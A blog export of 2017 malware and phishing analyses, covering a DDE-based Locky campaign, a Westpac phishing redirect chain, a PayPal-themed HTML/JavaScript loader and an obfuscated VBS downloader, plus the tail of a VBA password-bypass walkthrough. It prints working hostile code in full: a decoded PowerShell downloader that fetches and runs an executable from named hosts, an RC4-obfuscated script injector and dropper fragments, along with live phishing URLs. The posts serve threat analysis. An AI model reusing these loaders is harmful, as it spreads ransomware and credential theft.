<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDo6yyHtJcgcIduBGkHea-0IgAAVCuSU1wpw33qkfY9JNfdGeXj0YU4tfNgYMP1oDt8fT-m5W01AdqDIB_pV4YR4PrlhOA3OWzTgezuUUHvdeZgejUrOjo9ZKS8XFXA3TfyjSggmS0JVis/s1600/8.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="765" data-original-width="1119" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDo6yyHtJcgcIduBGkHea-0IgAAVCuSU1wpw33qkfY9JNfdGeXj0YU4tfNgYMP1oDt8fT-m5W01AdqDIB_pV4YR4PrlhOA3OWzTgezuUUHvdeZgejUrOjo9ZKS8XFXA3TfyjSggmS0JVis/s320/8.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaf_2oDSha5Vh8Fh_LdVxkh7GAnIXFIClVvWE0UB3lrRRHc0aMc7xfiRuHTmlFNeGvnk3oY93-BZzdDfKnP0ScGntCi_UII5sorHMqDbaRvVCROYpzsXUwAJWyamAmy1h4zokVBhPrl491/s1600/9.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="845" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaf_2oDSha5Vh8Fh_LdVxkh7GAnIXFIClVvWE0UB3lrRRHc0aMc7xfiRuHTmlFNeGvnk3oY93-BZzdDfKnP0ScGntCi_UII5sorHMqDbaRvVCROYpzsXUwAJWyamAmy1h4zokVBhPrl491/s320/9.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You will find it now.<br />
<br />
Change this to DPx and save the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl3FPS67CoUy3zkDniG_w7xNDAZT8oGlzg6s6LJf13x4vRU5g_tyfbFIb6Mi150-tPApIBoc-tMUP1lwbroucU5NvZqamTOlS514RjB8aJoFDBggrnmxxnjzgF-3-bBb3sl-QNDWU8O1L/s1600/10.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1259" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl3FPS67CoUy3zkDniG_w7xNDAZT8oGlzg6s6LJf13x4vRU5g_tyfbFIb6Mi150-tPApIBoc-tMUP1lwbroucU5NvZqamTOlS514RjB8aJoFDBggrnmxxnjzgF-3-bBb3sl-QNDWU8O1L/s320/10.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
4. Now, replace the bin file in the archive with this new file that you just saved. Note that we are not unzipping the file at any point.<br />
<br />
5. Move back up and rename the file extention back to .doc from .zip.<br />
<br />
6. Now open this file in word - it will throw a bunch of errors, just click through them.<br />
<br />
7. Now, when you go into the project, it will not ask you for a password, but will still not shoew you the code. That's ok, its expected. Don't panic, just go into the project properties and give it a new password. Save and exit.<br />
<br />
8. Re-launch the file in Word - go to the project, it'll ask you for a password. Give it the new password that you set.<br />
<br />
9. Enjoy.<br />
<br />
:)<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-38004532023665793852017-10-19T17:57:00.003-07:002017-10-19T17:58:47.278-07:00DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="p1">
<span class="s1">This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Flow:</b></span></div>
<div class="p1">
<span class="s1">Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Email:</b></span></div>
<div class="p1">
<span class="s1">Subject: Emailed Invoice - *</span></div>
<div class="p1">
<span class="s1">Attachment: l_123456.doc-</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Downloader:</b></span></div>
<div class="p1">
<span class="s1">FileName: I_099292.doc</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">MD5: 0910541c2ac975a49a28d7a939e48cd3</span></div>
<div class="p1">
<span class="s1">SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a</span></div>
<div class="p1">
<span class="s1">SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>DDE Flow:</b></span></div>
<div class="p1">
<br /></div>
<div class="p1">
1. Open the doc</div>
<div class="p2" style="text-align: left;">
<span class="s1"></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-bY3E9tJnJgv_aCCjB526tfguqV6XZt8ogDcboQEBRMxkRv19xxTxaI1JSze39l7OVYp_7rYBwAb-3pUX42O0RBIME7fQcdFrk9pHodwW6R-ME0AEuEWMrK8TZUR6vZ3_lpLJpP-9J9J/s1600/1.PNG" imageanchor="1" style="font-family: Times; font-size: medium; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="129" data-original-width="463" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-bY3E9tJnJgv_aCCjB526tfguqV6XZt8ogDcboQEBRMxkRv19xxTxaI1JSze39l7OVYp_7rYBwAb-3pUX42O0RBIME7fQcdFrk9pHodwW6R-ME0AEuEWMrK8TZUR6vZ3_lpLJpP-9J9J/s320/1.PNG" width="320" /></a></div>
<div class="p2" style="text-align: left;">
<span style="font-size: 11px;">2. This msg pops up:</span></div>
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrpCVJ0yR1cd4bXWoCUwbX5nDPF0-5lG0fxWBCt40Y2wRxWW2gveXDZ_eJUs2JD8V0pPinqrnsYN6P5LPeFFVBLD9QlfNsFOtYsqGa9fc5Q0iE_jV9A6ciJMFv6TFEL29dw4I00BACToG/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="297" data-original-width="1183" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrpCVJ0yR1cd4bXWoCUwbX5nDPF0-5lG0fxWBCt40Y2wRxWW2gveXDZ_eJUs2JD8V0pPinqrnsYN6P5LPeFFVBLD9QlfNsFOtYsqGa9fc5Q0iE_jV9A6ciJMFv6TFEL29dw4I00BACToG/s320/2.PNG" width="320" /></a></div>
<div class="p1">
<br /></div>
<div class="p1">
3. Nothing on the first page:</div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO68YYsYtFD-dMQ5eFPqaVtQrd5QbGq1wUfsl7lLoW6_HbIfVwJmsj-gTYePEYL4xtx0tccP-n-qqDBYjobpHH_eIWKqKvzgkybfH1IoGoKXl49g4K1glatR95Hqnh4v4A0Q__g-n7MAeN/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="747" data-original-width="1600" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO68YYsYtFD-dMQ5eFPqaVtQrd5QbGq1wUfsl7lLoW6_HbIfVwJmsj-gTYePEYL4xtx0tccP-n-qqDBYjobpHH_eIWKqKvzgkybfH1IoGoKXl49g4K1glatR95Hqnh4v4A0Q__g-n7MAeN/s320/5.PNG" width="320" /></a></div>
<div class="p2">
<br /></div>
<div class="p1">
<span class="s1"> 4. </span>Scroll to the end:</div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNDHXSY0jWMNg9R4Rgu_ZPkW_KcKwuqeYTrAsHQbJ5Z3lT7FP0yGL8kcay02bxknkta_nKZlXiyH4k1jXfFfUDpX7jEJ9Qoc7U2wQfz8s1YDd-6CPxTer2yw1b2qFhi17xIEBFObMS-hRR/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="661" data-original-width="1133" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNDHXSY0jWMNg9R4Rgu_ZPkW_KcKwuqeYTrAsHQbJ5Z3lT7FP0yGL8kcay02bxknkta_nKZlXiyH4k1jXfFfUDpX7jEJ9Qoc7U2wQfz8s1YDd-6CPxTer2yw1b2qFhi17xIEBFObMS-hRR/s320/6.PNG" width="320" /></a></div>
<div class="p2">
<br /></div>
<div class="p1">
5. This is the DDE code:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<ol class="ol1"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiecFIaaCpbYCapE9m-4Mn3aBBlP1hC7BXyIwgRp6iD2KFTszqOAXXq69bMPnDpmY-I2Q1nNEq3qlcCDdFaIk-sLeV1bdRpSzpsF-WuYZ0ycyhs3tAiYtYxsaNdqPIlAA9-xHX-U7824uAp/s1600/7.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" data-original-height="311" data-original-width="681" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiecFIaaCpbYCapE9m-4Mn3aBBlP1hC7BXyIwgRp6iD2KFTszqOAXXq69bMPnDpmY-I2Q1nNEq3qlcCDdFaIk-sLeV1bdRpSzpsF-WuYZ0ycyhs3tAiYtYxsaNdqPIlAA9-xHX-U7824uAp/s320/7.PNG" width="320" /></a></ol>
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<br style="font-family: Helvetica; font-size: 11px;" />
<span style="font-family: "helvetica"; font-size: 11px;">6. Toggle code:</span><br />
<ol class="ol1">
</ol>
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCBaUBQq45WsMQd-951N4tK34BpvW5v_QVdWOkceXZafubuukiqYL6qhrXZXarILvMrXvllNSWW2mkVmH96ACg4BuNMZikBqLJ2L03RMtiFRsI0faTpOC1CPvZ0PChP-OCiiB1ntQ5hyphenhyphenLs/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="692" data-original-width="1600" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCBaUBQq45WsMQd-951N4tK34BpvW5v_QVdWOkceXZafubuukiqYL6qhrXZXarILvMrXvllNSWW2mkVmH96ACg4BuNMZikBqLJ2L03RMtiFRsI0faTpOC1CPvZ0PChP-OCiiB1ntQ5hyphenhyphenLs/s320/8.png" width="320" /></a></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<span style="font-family: "helvetica"; font-size: 11px;">7. This should give you the actual code:</span><br />
<ol class="ol1">
</ol>
<div class="p1">
<span class="s1"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7aKVrmwoYfaLVJMCuyselbTYx3hig5yFpT5M3Z8WTjccBIzQAk_0AFkUCZapmG0K_CjLlWwJ_bGMOtIcZCNVEunVoEuxriiRHvJTHJgDmbX6Uz8A8nKaC-3yZd4LDFOajdcW2GLYrAK61/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="451" data-original-width="1573" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7aKVrmwoYfaLVJMCuyselbTYx3hig5yFpT5M3Z8WTjccBIzQAk_0AFkUCZapmG0K_CjLlWwJ_bGMOtIcZCNVEunVoEuxriiRHvJTHJgDmbX6Uz8A8nKaC-3yZd4LDFOajdcW2GLYrAK61/s320/9.PNG" width="320" /></a></div>
<div class="p2">
<span class="s1"></span><br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">This downloader was found to be serving Locky.</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">The above DDE code reaches out and grabs the string from arkberg-design*fi, which is Base64 encoded:</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">*<b>DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwBoAGEAbQBhAG4AaQBjAC0AZQB4AHQAcgBhAGMAdABzAC4AYgBpAHoALwBlAHUAcgBnAGYAOAAzADcAbwByACIALAAiAGgAdAB0AHAAOgAvAC8AYwBlAG4AdAByAGEAbABiAGEAcAB0AGkAcwB0AGMAaAB1AHIAYwBoAG4AagAuAG8AcgBnAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiACwAIgAiACwAIgBoAHQAdABwADoALwAvAGMAbwBuAHgAaQBiAGkAdAAuAGMAbwBtAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQA*cgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIA*AkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAHIAZQBrAGEAawB2AGEAMwAyAC4AZQB4AGUAIgAJAA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAGYAcAANAAoACQAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA0ACgAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAGYAcAApAA0ACgAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAANAAoACQBiAHIAZQBhAGsADQAKAH0ADQAKAEMAYQB0AGMAaAANAAoAewANAAoAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoADQAKAAkADQAKAH0ADQAKAA==</b>*</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">Decoded:</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">$urls = "hxxp://<b>shamanic-extracts.biz</b>/ eurgf837or","hxxp://<b>centralbaptistchurchnj.org</b>/ eurgf837or","","hxxp://<b>conxibit.com</b>/ eurgf837or"</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">foreach($url in $urls){</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">Try</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">{</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> Write-Host $url </span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> $fp = "$env:temp\rekakva32.exe"</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> Write-Host $fp</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> $wc = New-Object System.Net.WebClient</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> $wc.DownloadFile($url, $fp)</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> Start-Process $fp</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> break</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">}</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">Catch</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">{</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> Write-Host $_.Exception.Message</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">}</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"> </span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1">}</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica}
p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px}
li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica}
span.s1 {font-kerning: none}
ol.ol1 {list-style-type: decimal}
</style>
</div>
<div class="p1">
<span class="s1">The payload is Locky.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
:)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-65255836267940156872017-09-27T17:09:00.001-07:002017-09-27T17:09:16.893-07:00Phishing - google redirect function used in link for phising WestPac bank<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w<br />
<br />
Which should lead to: http://www.almatulum.com/blog/new-lounge-area/<br />
<br />
Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483<br />
<br />
Which is the fake westpac page.<br />
Just another phishing email with a twist.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ92VgD6tP8Tn4cBszWMAay7hshyphenhyphenZxhZhe0emPCSrp7vpX-im4bDQ8emqUAYEGdkeQk2tXqPp9iSkxCBj_mrRs3W3inAWk3vnEr0Cbl2Mit6hdrVvUXn8g3LEgZU5BEDSEhgcny8dqE3tT/s1600/westpac_phish.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="948" data-original-width="1600" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ92VgD6tP8Tn4cBszWMAay7hshyphenhyphenZxhZhe0emPCSrp7vpX-im4bDQ8emqUAYEGdkeQk2tXqPp9iSkxCBj_mrRs3W3inAWk3vnEr0Cbl2Mit6hdrVvUXn8g3LEgZU5BEDSEhgcny8dqE3tT/s640/westpac_phish.png" width="640" /></a></div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-70508499591110651302017-09-26T17:22:00.002-07:002017-09-26T17:22:46.997-07:00Phishing - JavaScript loader in HTML page - PayPal theme<div dir="ltr" style="text-align: left;" trbidi="on">
This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything. <br />
<br />
Syntax Highlighting: <br /><br /><!DOCTYPE html><br /><html lang="en-US"><br /><head><br /><meta charset="utf-8"><br /></head><br /><br /><body><script><br /><br />function c7tn83(rd1jqp4)<br />{<br />var lgx4s84f = 0;<br />var pojb6ff = '';<br />if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }<br />if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }<br />for(var apnsxieh=lgx4s84f; apnsxieh<rd1jqp4.length; apnsxieh+=2) {<br />var c = rd1jqp4.substr( apnsxieh, 2 );<br />pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );<br />}<br />return pojb6ff;<br />}<br /><br />function f8ce53222(ll1u8137, rx3oj311) {<br /> var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;<br /> for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;<br /> for (in3431y23 = 0; in3431y23 < 256; in3431y23++)<br />khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,<br />gecb = pf9879t75[in3431y23],<br />pf9879t75[in3431y23] = pf9879t75[khqr2],<br />pf9879t75[khqr2] = (gecb);<br /> for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)<br />in3431y23 = ((in3431y23 + 1) % 256),<br />khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),<br />gecb = pf9879t75[in3431y23],<br />pf9879t75[in3431y23] = pf9879t75[khqr2],<br />pf9879t75[khqr2] = gecb,<br />jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);<br /> return jxl077g53<br />}<br /><br />var <span style="background-color: yellow;">p918</span> = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");<br />*/ p918: "http://www.<span style="background-color: lime;"><b>subject-data.com</b></span>/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser<br /><br /><br />
var <span style="background-color: yellow;">zgdz</span> = f8ce53222(c7tn83("a477edb69a82"),"j388p");<br />
<br />
*/ zgdz: "script"<br />
<br />var qw1mpd9 = document.createElement(zgdz);<br />qw1mpd9.src = p918;<br />var <span style="background-color: yellow;">jkl6lg</span> = f8ce53222(c7tn83("bf71febb"),"j388p");<br />
*/ jkl6lg: "head"<br />
<br />document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);<br />
*/ this will result in: head > script > JS<br /></script><br /><br /></body><br /></html></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-55303264607894780782017-09-25T21:37:00.000-07:002017-09-25T21:39:03.936-07:00Here's a simple, straight-forward downloader that can serve any payload<div dir="ltr" style="text-align: left;" trbidi="on">
<u>Written in simple VBS, launched by WScript on a Win host. </u><br />
<br />
<u>Currently serving Locky Ransomware </u><br />
<br />
<br />
Dim UltraXgettingensurance 'As String<br />
<br />
Dim UltraXgettingUotOfStock 'As String<br />
<br />
Function CopyLog()<br />
<br />
Dim oFile<br />
Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile<br />
Dim sComputer<br />
Dim sLog<br />
Dim sBootDrive<br />
' Make sure the path is accessible<br />
oUtility.ValidateConnection oEnvironment.Item("SLShare")<br />
oUtility.VerifyPathExists oEnvironment.Item("SLShare")<br />
If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then<br />
oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning<br />
Exit Function<br />
End if<br />
<br />
<br />
<br />
End Function<br />
<br />
Function Set2Mine(Who, Color, X, y ) <br />
For i = 0 To UBound(Mines) + 1<br />
If i > UBound(Mines) Then ReDim Preserve Mines(i)<br />
If Mines(i).Color = 0 Then<br />
Mines(i).Who = Who<br />
Mines(i).Color = Color<br />
Mines(i).X = X<br />
Mines(i).y = y<br />
Mines(i).Tick = 0<br />
SetMine = i<br />
Exit For<br />
End If<br />
Next<br />
End Function<br />
<br />
<br />
<br />
<br />
Function StateUovertakesgetting()<br />
if D = 19 then<br />
AXC = "SaveT"+"oFile"<br />
end if<br />
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7<br />
End Function<br />
<br />
UltraXgettingBelish = "User"<br />
<br />
<br />
<br />
<br />
Function F3(p, ddd) <br />
Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell") <br />
End Function <br />
<br />
Dim Advancedmantel2 'As String<br />
<br />
Function ABTF(A, B, T, F)<br />
set ABTF = A.CreateTextFile( B,T , F)<br />
end function<br />
<br />
Dim UltraXgettingRickyTIcky 'As Object<br />
Dim StateUovertakes4000 'As Object<br />
<br />
RACHEL = "avetof"<br />
<br />
Dim TristateTrue<br />
<br />
Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"<br />
Vrungel = ".respo"+"nseBody"<br />
Function SheduledObject(p,d)<br />
<br />
<br />
UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )<br />
End Function<br />
<br />
<br />
Dim UltraXgettingTimeTo 'As Object<br />
Dim UltraXgettingstatus<br />
UltraXgettingstatus = false<br />
Dim JohnTheRipper<br />
Dim UltraXgettingcashback 'As Object<br />
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"<br />
<br />
Dim UltraXgetting1DASH1solo 'As Object <br />
<br />
Advancedmantel2 ="Microsoft." + Advancedmantel2+ "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"<br />
<br />
<br />
Function MambaMamba( TIK )<br />
MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ), TIK)<br />
End Function<br />
Dim mual<br />
<br />
Function StateUovertakesgetting2(param1)<br />
param1 = param1 + param1<br />
<br />
UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody<br />
param1 = 4 * param1 + 8 <br />
<br />
End Function<br />
<br />
<br />
Public Function IsLineAnalytic(ByVal Figure1 )<br />
If Figure1 < FigureCount And Figure1 >= 0 Then<br />
If Figures(Figure1).FigureType = dsAnLineCanonic Or _<br />
Figures(Figure1).FigureType = dsAnLineGeneral Or _<br />
Figures(Figure1).FigureType = dsAnLineNormal Or _<br />
Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True<br />
End If<br />
End Function<br />
<br />
<br />
Public Function IsCircleAnalytic(ByVal Figure1 ) <br />
If Figure1 < FigureCount And Figure1 >= 0 Then<br />
If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True<br />
End If<br />
End Function<br />
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"<br />
Function UltraXgettingFuks(p)<br />
<br />
UltraXgettingRickyTIcky.Send<br />
<br />
End Function <br />
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")<br />
<br />
<br />
<br />
Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )<br />
If historyLength < 1 Then<br />
historyLength = 1 ' Minimum history length is one!<br />
End If<br />
<br />
' Sort by date descending (default sorter for PST sorts descending)<br />
curlist.Sort()<br />
<br />
' Now purge any old files<br />
For i = 0 To curlist.Count - 1<br />
If i >= historyLength Then<br />
Me.PurgePodcastFile db, curlist(i)<br />
End If<br />
Next<br />
End Sub<br />
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))<br />
<br />
Dim UltraXgetting4 'As String<br />
<br />
Dim UltraXgettingResponseBody 'As Variant<br />
Dim UltraXgettingRombickom<br />
Dim MarketPlace 'As String<br />
Dim sTempVis 'As String<br />
Dim iCount 'As Integer<br />
Public Function WriteCD(aWrite,bWrite)<br />
astp = 12<br />
astp = astp + 3<br />
if astp > 4 then<br />
aWrite.Write bWrite<br />
